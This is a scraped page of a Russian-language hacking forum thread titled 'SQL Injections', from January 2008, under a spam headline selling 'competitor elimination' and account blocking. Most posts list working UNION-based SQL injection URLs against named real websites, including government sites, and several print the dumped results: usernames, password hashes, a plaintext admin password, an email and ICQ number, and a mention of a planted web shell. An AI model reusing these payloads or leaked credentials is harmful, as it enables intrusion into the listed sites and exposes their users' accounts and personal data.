УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 455 из 1242

455

Опции темы

Поиск в этой теме

Опции просмотра

#4541

18.01.2008, 01:30

Momiji

Постоянный

Регистрация: 25.08.2007

Сообщений: 530

Провел на форуме:
3926698

Репутация: 1446

Отправить сообщение для Momiji с помощью ICQ

http://www.peekvid.com

Код:

http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,version(),user(),database())/*

5.0.22root@kentuckyprivpeekvid_v2

Код:

http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,user,password)+from+mysql.user/*

Root67ef27e02618b87a:ZAQxsw

#4542

18.01.2008, 02:00

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version( ),database(),user())

5.0.51/hdds/hdds@localhost

http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,username ,password,email,icq)+from+forums_auth+limit+0,1

логин/хеш/мейл/асику
Cavaler/50cc3872ca61179a359e6263a3fd3d43/pavel@kostrom.spb.ru/48555995

#4543

18.01.2008, 02:45

presidentua

Постоянный

Регистрация: 04.11.2007

Сообщений: 331

Провел на форуме:
1724067

Репутация: 806

Отправить сообщение для presidentua с помощью ICQ

газета Труд кому то надо?
ну тогда держите -

Код:

http://www.trud.ru/issue/shortnews.php?id=-64066+union+select+1,2,user(),version(),5,6,7/*

trudinfo@localhost
4.1.21-log

#4544

18.01.2008, 20:54

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

MSSQL
_http://www.treasury.gov.au/content/tax_treaties.asp?ContentID=759'
_http://www.nsw.gov.au/Business_results.asp?SEARCH_KEYS='OPER_LCYCLE_BUSI NESS_SNSW&DISPLAY1=Business+Life+Cycle&DISPLAY2=Op erating+a+Business
_http://www.montgomerycountymd.gov/csltmpl.asp?url='/content/council/index.asp
_http://web.nsc.gov.tw/default.asp?mp=7'
_http://www.pme.gov.sa/warnning/file.asp?ID=68'
_http://www.izkor.gov.il/izkor86.asp?t=0'&dir=0&i=0&pab=4332&nab=91086&pdt= 8318&ndt=9

MySQL
_http://www.wiredforhealth.gov.uk/cat.php?catid=842'
_http://www.monitor-nhsft.gov.uk/publications.php?cat=8'
_http://www.cszx.gov.cn/art/catb.php?catid=1'
_http://www.yarriambiack.vic.gov.au/council_services/sub_menu.php?subMenuId=119&menuId=27'
_http://www.tcvn.gov.vn/en/index.php?p=cat&cid=35'

_http://porx.rambler.ru/porx/viewprofile.php?user=%D0%B4%D0%BE%D0%BB'
_http://hotel.travel.rambler.ru/vitrina.asp?sDescr=1390'

Последний раз редактировалось ReVOLVeR; 18.01.2008 в 21:07..

#4545

18.01.2008, 22:06

.nor

Познающий

Регистрация: 29.06.2007

Сообщений: 51

Провел на форуме:
1650734

Репутация: 14

Код:

http://info.l2r.ru/?part=items&id=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20(%22henna%22,%22drops_5%22))--

таблицы - henna и drops_5 дальше подобрать не смог ибо запятые жестоко фильтруются.
Пробовал различные методы в т.ч 0x2c , сhar'ы и тд. кто найдёт замену этой запятой плз скиньте инфу сюда или в личку)

Последний раз редактировалось .nor; 19.01.2008 в 06:21..

#4546

18.01.2008, 22:54

~~ХаЬа~~

Banned

Регистрация: 18.01.2008

Сообщений: 6

Провел на форуме:
29103

Репутация: 25

Код:

http://www.freegaming.de/index.php?option=com_puarcade&Itemid=92&fid=-1+union+select+concat(username,0x3a,password)+from+jos_users/*

#4547

19.01.2008, 07:37

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Отправить сообщение для it's my с помощью ICQ

Код:

http://adeptweb.info/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.budshop.com.ua/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://kadrovest.ru/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://hostofmine.net/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.akademikerzeitung.ch/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.jerseyrecruitment.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.identitytextiles.com/2007/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://tryanotherangle.com/joomla/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.ilm-media.at/portal/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.worldfashioncouncil.org/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.sagentpharma.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.rh-communication.ch/cms/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.kinayperde.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.innoventions.co.za/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://chinstudent.org/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.zeros2heroes.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.jovita.lt/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.stopthetraffik.nl/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.circusfrog.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://portalul.eu/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*

#4548

19.01.2008, 15:29

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

Провел на форуме:
599789

Репутация: 227

sql-inj

Цитата:

http://www.kinder.by/consultant/qa/read.php?topicid=-1+union+select+1,2,3,concat_ws(0x3a,login,passwd,u ser,id),5+from+profiles/*
http://www.voina-i-mir.ru/dicchapter/?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6
http://www.rest.crimea.ua/internat.php?urlp=&fid=34'+union+select+1,concat_w s(0x3a,version(),database(),user()),concat_ws(0x3a ,email,city,address,phone,fax,icq),4,5,6,7,8,9,10+ from+orders+where+email<>1/*
http://www.astralpole.org/display.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,concat_ws(0x3a,user,password),7,8 ,9,10,11,12,13+from+mysql.user/* ( шелл http://www.astralpole.org/files/ms.php )
http://www.propertyshop.bg/news.php?lang=ru&valuta=&id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3/*
http://www.animemagazine.ru/catalog/index.php?idk=-1)+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,version(),database(),user()),12,13,14,15,16,17,1 8,19,20,21,22/*
http://www.ethology.ru/interview/?id=1+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user()),7,8/*
http://www.avd.org.ua/viewdetails.php?id=-1+union+select+1,concat_ws(0x3a,username,passwd),3 ,4,concat_ws(0x3a,version(),database(),user()),6,7 ,8,9,10,11,12,13,14,15+from+user/*
http://www.bhv.ru/books/boa.php?id=-1))+and+((1=1 (адмиинка http://www.bhv.ru/admin/)
http://www.delphi.int.ru/download.php?id=-1)+union+select+concat_ws(0x3a,id,email,country,ci ty,website,icq,uname,password)+from+users/*
http://65-k.com/news.php?mode=show&id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6/*
http://www.punk.org.ua/users/detail.php?id=999+union+select+1,2,3,4,5,6,7,8,con cat_ws(0x3a,id,email,login,password),10,11,12,13,1 4,15,16,17,18,19,20,21,22,23+from+users
http://www.lyapis.com/photo.php?cl=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user())

#4549

19.01.2008, 18:16

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

CMS I-cont

_________________________________

http://www.maybach-manufaktur.ru/news/?id=-9+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+maybach_users/*

http://www.emspost.ru/en/news/archive/?id=-498+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+ems_users+limit+2,1/*

http://serpentor.ru/news/?id=-368+union+select+1,concat(login,0x3a,pwd),3,4,5,6, 7,8+from+serpentor_users+limit+1,1/*

http://trinity-cis.com/en/news/?id=-12+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7 ,8,9,10,11,12+from+trinity_users/*

http://www.marcor.ru/news/?id=-21+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7 ,8,9+from+marcor_users/*

http://www.relod.ru/news/?id=-109+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9,10,11+from+relod_users/*

http://www.itclinic.ru/press_center/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9,10+from+itclinic_users/*

http://www.rochet.ru/news/?id=-379+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+rochet_users/*

http://www.gluon.ru/news/?id=-375+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+gluon_users/*

http://www.schnittke-mgim.ru/news/?id=-26+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7 ,8,9,10+from+shnitke_users/*

http://www.eurotemp.ru/news/?id=-16+union+select+1,2,concat(login,0x3a,pwd),4,5+fro m+eurotemp_users/*

http://www.samaya-samaya.ru/company/news/?id=-22+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7 ,8,9,10,11+from+sam_users/*

http://www.mostd.ru/news/?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5+from +mostd_users/*

http://ikrs.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+ikrs_users/*

http://www.1tort.ru/news/?id=-366+union+select+1,2,3,4,5,concat(login,0x3a,pwd), 7,8,9,10+from+1tort_users/*

http://neftebor.ru/news/?id=-17+union+select+1,2,3,concat(login,0x3a,pwd),5,6,7 ,8,9+from+neftebor_users/*

http://www.harmline.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+harmony_users/*

http://www.eko-sad.ru/news/?id=-395+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+ecosad_users/*

http://www.panoramakino.ru/news/?id=-374+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+panorama_users/*

http://www.hotelpearl.ru/news/?id=-13+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7 ,8,9+from+hotelpearl_users/*

http://www.mp218.ru/articles/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+mp218_users/*

http://digitec.ru/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+digitec_users/*

http://www.japanplast.ru/news/?id=-7+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+japanplast_users/*

http://www.angic.ru/news/?id=-5+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+angic_users/*

http://dvector.ru/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9,10+from+dvector_users/*

http://www.lucsor.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+lucsor_users/*

http://www.nstkani.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9,10+from+nika_users/*

http://omnia-insurance.com/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+omnia_users/*

http://www.leon-beton.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+leon_users/*

http://www.zalogu.net/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+zalogu_users/*

http://www.adanilov.ru/news/?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a,pwd), 8,9,10,11+from+danilov_users/*

http://www.melodytour.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+melody_users/*

http://www.abarysheva.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+barysheva_users/*

http://www.torshin.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+torshin_users/*

_________________________________

виновник этого безобразия

:

http://www.i-market.ru/news/?id=-434+union+select+1,2,3,4,5,concat(login,0x3a,pwd), 7,8,9,10+from+imarket_users/*

_________________________________

админки находятся по адресу

http://site.ru/adm

хеш паролей простой md5

_________________________________

p.s взломано при помощи телефона nokia N70,браузера Opera-mini(mod) и... не совсем кривых рук

#4550

19.01.2008, 19:59

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

Цитата:

Сообщение от 159932

4.0.27-log
-----------------------------------------------------

4.0.27-log
-----------------------------------------------------

4.0.17-nt
-----------------------------------------------------

5.0.24-community-nt
http://www.isobelcampbell.com/phpbb2/
13к узеров
admin:hamilton
-----------------------------------------------------

я конечно понимаю что офиц сайт битлз - это кощунство - но всётаки ..
но вывода добиться не удалось (( можт комуто повезёт больше ))

http://www.beatles.com/hub/article.php?page=-yeloSub'+union+select+1,2,version(),4/*&menuItem=the%20films

5 мускул,а дальше сам копай

Страница 455 из 1242

455

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход